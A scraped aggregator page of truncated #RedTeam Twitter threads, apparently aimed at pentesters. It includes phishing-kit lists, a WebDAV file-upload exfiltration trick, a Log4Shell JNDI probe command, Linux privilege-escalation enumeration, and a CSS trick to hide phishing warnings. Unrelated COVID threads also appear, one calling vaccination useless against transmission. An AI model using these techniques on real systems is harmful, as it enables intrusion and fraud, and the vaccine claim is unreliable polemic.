Discover and read the best of Twitter Threads about #RedTeam

Most recents (24)

Red Team toolkit : 📢

#infosec #redteam #Hacking

RECONNAISSANCE:

- RustScan ==> lnkd.in/ebvRfBNy

- Amass ==> lnkd.in/e7V569N5

- CloudEnum ==> lnkd.in/ePHDeGZv

- Recon-NG ==> lnkd.in/edwaXFjS

- AttackSurfaceMapper ==> lnkd.in/ebbcj6Rm
INITIAL ACCESS:

- SprayingToolKit ==> lnkd.in/eBSAPz5z

- o365Recon ==> lnkd.in/eJwCx-Ga

- GadgetToJScript ==> lnkd.in/egPQBBXJ

- ThreatCheck ==> lnkd.in/eHvSPakR

- Freeze ==> lnkd.in/eNUh3zCi
DELIVERY:

- o365AttackToolKit ==> lnkd.in/etCCYi8y

- EvilGinx2 ==> lnkd.in/eRDPvwUg

- GoPhish ==> lnkd.in/ea26dfNg

- PwnAuth ==> lnkd.in/eqecM7de

- Modlishka ==> lnkd.in/eds-dR5C
Read 10 tweets
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext
#lolbin #redteam
(Bonus ADS 😆)
To host a simple python WebDAV server use wsgidav.
wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
github.com/mar10/wsgidav
If anyone knows how to have a webserver interpret the PROPFIND method as a GET method, I would be very interested in learning.
Read 4 tweets
Let's learn Red Teaming together
[Thread]🧵👇
Read 11 tweets
Red Team Resources 🖥

• Red Team Management by Joas
github.com/CyberSecurityU…

• Awesome Red Team by yeyintminthuhtut
github.com/yeyintminthuht…

• Awesome Red Team Operations by Joas
github.com/CyberSecurityU…

#cybersecurity #infosec #hacking #redteam
• Awesome Adversary Simulation Toolkit by 0x1
0x1.gitlab.io/pentesting/Red…

• Red/Purple Team by s0cm0nkey
s0cm0nkey.gitbook.io/s0cm0nkeys-sec…

• SpecterOps Red Team Blog
posts.specterops.io/tagged/red-tea…

• iRed Team Blog
ired.team/?trk=public_po…
• Red Team Tips Blog by Jean Maes
redteamer.tips

• Red Team Blog by Zach Stein
synzack.github.io

• Untrustaland by João Paulo
untrustaland.com

• 100Security by Marcos Henrique
100security.com.br

• Red Team Village
redteamvillage.io
Read 4 tweets
Here's a list of free #PenetrationTesting and #RedTeam Labs you may set up in your own home to enhance your #hacking abilities :
1) Red Team Attack Lab
A simulated setting where red teams can practice exploiting #vulnerabilities in various operating systems.
lnkd.in/ernefQv8
2) Capsulecorp Pentest
#Capsulecorp is a lightweight virtual infrastructure operated using Vagrant and Ansible. One #Linux attacking system running #Xubuntu is included, along with four #Windows 2019 servers hosting a variety of #exploitable services.

lnkd.in/eYfGmNBe
Read 10 tweets
Thanks to @Rob_Roos it is now finally clear to everyone (except @MarionKoopmans, @MarcBonten and a few more of those vax pushers) what has long been clear to us 'wappies': vaccination had and has no effect on transmission. A serious thread:
The #coronatoegangsbewijs or #CTB or #QRcode was (and is) therefore (always) based on an unscientific assumption at best and a lie at worst. Nevertheless, on that basis (a) millions of people were excluded for months from large parts of social life and ...
(b) undue pressure was put on many people to get vaccinated after all, for example to be able to go on holiday or - in other countries - to not lose their job or to be able to do grocery shopping at all. Austria had even introduced a vaccination mandate.
Read 13 tweets
The Free Webinar: "Exploitation with Kali Linux" is available on video. #hacking #cybersecurity #redteam #osint #forensics 🔒 reydes.com/d/?q=videos_20…
Many thanks @GogodinezGo for the retweet.
Thanks @RDSWEB for the retweet.
Read 7 tweets
Free #Webinar: "Forensic Analysis of Apache". Thursday, June 2, 2022. From 5:00pm to 5:45pm (UTC -05:00). #hacking #cybersecurity #redteam #osint #forensics Free registration at: reydes.com/d/?q=eventos
Many thanks @Pumajosel for the retweet of the Free Webinar: "Forensic Analysis of Apache". Thursday, June 2, 2022.
Thanks @raumunz for the retweet of the Free Webinar: "Forensic Analysis of Apache". Thursday, June 2, 2022.
Read 11 tweets
The Free Webinar: "Digital Forensics on Windows Systems" is available on video. #hacking #cybersecurity #redteam #osint #forensics 🔒 reydes.com/d/?q=videos_20…
Many thanks @SilenusHack for the retweet.
Thanks @ciberconsejo for the retweet.
Read 11 tweets
The only virtual Network Forensics course (#Curso) of 2022. Sundays, June 5, 12, 19 and 26. From 9:00 am to 12:00 pm (UTC -05:00). #hacking #cybersecurity #redteam #osint #forensics More information at: reydes.com/d/?q=Curso_For…
Many thanks @JCarlosLV2014 for the retweet of the only virtual Network Forensics course of 2022
Thanks @RDSWEB for the retweet of the only virtual Network Forensics course of 2022
Read 12 tweets
We have finished the fourth and final session of the only virtual OSINT - Open Source Intelligence course of 2022. #hacking #cybersecurity #redteam #osint #forensics reydes.com/d/?q=Curso_de_… Many thanks to all the participants!
Many thanks @Infogon for the retweet of the only virtual OSINT - Open Source Intelligence course of 2022
Thanks @pyth4gorean for the retweet of the only virtual OSINT - Open Source Intelligence course of 2022
Read 11 tweets
We are starting the fourth and final session of the only virtual OSINT - Open Source Intelligence course of 2022. #hacking #cybersecurity #redteam #osint #forensics reydes.com/d/?q=Curso_de_…
Many thanks @MarcosJLpezL1 for the retweet of the only virtual OSINT - Open Source Intelligence course of 2022
Thanks @AFroufe for the retweet of the only virtual OSINT - Open Source Intelligence course of 2022
Read 11 tweets
The only virtual Network Forensics course of 2022. Sundays, June 5, 12, 19 and 26. From 9:00 am to 12:00 pm (UTC -05:00). #hacking #cybersecurity #redteam #osint #forensics More information at: reydes.com/d/?q=Curso_For…
Many thanks @MiguelJimenezMK for the retweet of the only virtual Network Forensics course of 2022.
Thanks @carlaSaab777 for the retweet of the only virtual Network Forensics course of 2022.
Read 7 tweets
The Free Webinar: "Vulnerabilities in Web CMS" is available on video. #hacking #cybersecurity #redteam #osint #forensics 🔒 reydes.com/d/?q=videos_20…
Many thanks @Infogon for the retweet.
Thanks @JCarlosLV2014 for the retweet.
Read 6 tweets
#SaveTheDate! On 14/06 the CReC @SaintCyrCoet is organizing a study day on "War and Fiction. The effects of fiction on the conduct of war". @Inflexions10, @IRSEM1, @defense_ouest, @e_rioux, @mbourlet, @PhChapleau, @jean__michelin👇
In particular, with the #RedTeam, @staillat, @ABRGLL, in the presence of @JulienNocetti, @DidierDanet, @SandraCureau and a few others, the aim will be to reverse the perspective:
Not the way in which, quite predictably, war inspires fiction, but how the various forms of fiction influence the way war is waged (or prepared).
Read 5 tweets
== Trademark and Copyright Recon ==

How to find assets no other bug hunters have found.

One of my simple "secrets" for years.

Little automation exists for it.

💸💸💸

a thread🧵

🚨follow, retweet, & like for more hacker tips!🚨

1/x
When approaching a bounty, the scope is important. Not only the domain list but all the text.

There are about ~30 paid bounty programs across the major platforms that are explicitly open scope or have the wording right under the scope section that says something like...

2/x
"If you find anything else that you believe to belong to XYZ company, report it and we will assess its validity. It may not result in a bounty"

But.. To be honest, criticals usually DO get paid.

3/x
Read 6 tweets
The Linux Privilege Escalation Cheatsheet... :)

Credits ~ @g0tmi1k

👇🏻🧵

#cybersecurity #infosec #linux #hacking #redteam
Operating System
What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release

What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a
Read 21 tweets
This whole thread, including the replies, shows the powerlessness of the way we in NL handled the corona crisis. I too read the article that @Gert_van_Dijk reacted to. 'Corona hit migrants and people with low incomes the hardest'. News that was not news >
after all, we had known this for a long time. We kept warning about this and kept trying to act on it as well as we could, also at the GGDs. The anger that @Ammer_B feels, I feel too. The powerlessness. You try so terribly hard to turn the tide, to >
make your contribution. Being busy with this day and night. Not because it is your 'business model', but because you cannot bear to watch the same groups of people take the hardest blows again and again. And in this case the blows were very, very hard. As a GGD employee I was fairly quickly >
Read 17 tweets
If you have a Struts2 target, you can try to find if it's vulnerable to #Log4Shell

curl -vv -H "If-Modified-Since: \${jndi:ldap://localhost:80/abc}" http://localhost:8080/struts2-showcase/struts/utils.js

#bugbountytips #log4jRCE #bugbounty #infosec #cybersecurity #redteam 1/n
"DefaultStaticContentLoader" class which loads static assets in Struts2 logs a warning if the date passed in "If-Modified-Since" is invalid.

Reference:

attackerkb.com/topics/in9sPR2…

2/n
List of default static asset paths in Struts2 (taken from the Rapid7 analysis):

tooltip.gif
domtt.css
utils.js
domTT.js
inputtransfersselect.js
optiontransferselect.js

3/n
Read 3 tweets
A really really long list of beginner Reverse Engineering resources I have found 🧵 (if you know others please post them below, thank you!) #infosec
Teaches some great tricks that reverse engineers use in order to 'crack' certain types of applications. octopuslabs.io/legend/blog/ar…
A great resource to have around, it endeavors in all you need to know and more! Not only does it teach you theories around the concepts of Reverse Engineering, it also applies practical application. beginners.re
Read 10 tweets
Quick 🧵of some of the insights and actions we're sharing with our customers based on Q2 '21 incident data.

TL;DR:
- #BEC in O365 is a huge problem. MFA everywhere, disable legacy protocols.
- We’re 👀 more ransomware attacks. Reduce/control the self-install attack surface.
Insight: #BEC attempts in O365 were the top threat in Q2, accounting for nearly 50% of the incidents we identified

Actions:
- MFA everywhere you can
- Disable legacy protocols
- Implement conditional access policies
- Consider Azure Identity Protection or MCAS
re: Azure Identity Protection & MCAS: They build data models for each user, making it easier to spot atypical auth events. Also, better logging. There's $ to consider here, I get it. Merely providing practitioner's perspective. They're worth a look if you're struggling with BEC.
Read 13 tweets
🧵on stealing TeamViewer credentials

Many organizations have systems with TeamViewer actively running; some know it and manage it correctly, others have no idea it is running or where. The latter probably have multiple versions #redteam #blueteam #purpleteam #ThreatThursday 1/10
I started looking deeper into TeamViewer when @snlyngaas reported that a Florida water facility had been breached. A malicious actor used TeamViewer to log in and change the levels of sodium hydroxide. The plant operator saw this and no damage was done cyberscoop.com/florida-water-… 2/10
For those that speak @MITREattack we are talking about T1078 Valid Accounts: attack.mitre.org/techniques/T10…
But how were these credentials obtained? We don't know but @brysonbort spoke with #RSAC about it if you want more on the Florida water plant breach: 3/10
Read 10 tweets
idk why I haven't thought of this before, but it's very easy to hide those "external sender" warnings that get appended to your emails during phishing campaigns 🤔. Email gateways/FW just add HTML at the start/end of emails, simply add CSS to hide it! #RedTeam

See images:
The showcased HTML should handle most generic warnings out there, might have to tweak it a little if your template interferes with it (i.e. if your template leverages <table>)
A good mitigation is to use solutions like these, if you can techcommunity.microsoft.com/t5/exchange-te…

Not sure if other email providers use it, but it shows the email is external from within the client's UI which is neat... can't be modified by the email HTML obviously.
Read 3 tweets
